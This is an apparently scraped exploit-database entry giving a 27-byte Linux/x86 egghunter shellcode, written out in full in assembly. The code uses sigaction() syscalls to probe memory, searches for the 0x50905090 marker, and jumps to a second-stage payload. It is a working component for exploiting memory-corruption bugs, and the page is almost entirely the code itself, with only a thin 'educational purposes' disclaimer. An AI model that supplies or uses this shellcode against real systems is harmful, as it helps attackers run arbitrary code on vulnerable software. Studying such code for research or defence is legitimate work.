Exploits / Vulnerability Discovered : 2018-09-20 |
Type : shellcode |
Platform : linux_x86
This exploit / vulnerability Linux/x86 egghunter (0x50905090) + sigaction() shellcode (27 bytes) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
/*
# Title: Linux/x86 - Egghunter + sigaction-based Shellcode (27 bytes)
# Author:Valbrux
# Date: 2018-09-19
# This exploit is a dirty-slow but small version of the sigaction-based egg hunter shellcode
global _start
section .text
;zeroing ecx
xor ecx,ecx
_start:
;increment
inc ecx
;sigaction syscall number
push byte 67
pop eax
;executing syscall
int 0x80
;if EFAULT
cmp al,0xf2
;page alignment
jz _start
;moving EGG
mov eax,0x50905090
;current address
mov edi,ecx
;checking current address with EGG two times
scasd
jnz _start
scasd
jnz _start
;if equals jump to shellcode
jmp edi